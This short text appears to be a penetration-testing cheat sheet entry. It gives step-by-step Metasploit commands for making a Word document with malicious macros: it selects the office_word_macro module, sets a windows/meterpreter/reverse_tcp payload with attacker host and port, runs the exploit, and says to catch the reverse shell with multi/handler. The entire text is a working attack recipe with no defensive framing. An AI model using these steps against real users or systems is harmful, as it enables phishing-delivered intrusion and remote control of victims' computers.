Creating Malicious Document

Using Metasploit to create a document with malicious macros

  1. Launch Metasploit
  2. use exploit/multi/fileformat/office_word_macro
  3. set payload  windows/meterpreter/reverse_tcp
  4. set LHOST (local IP)
  5. Set LPORT (any port you are going to connect back to)
  6. exploit

Catch the reverse shell

  1. Use the metasploit module multi/handler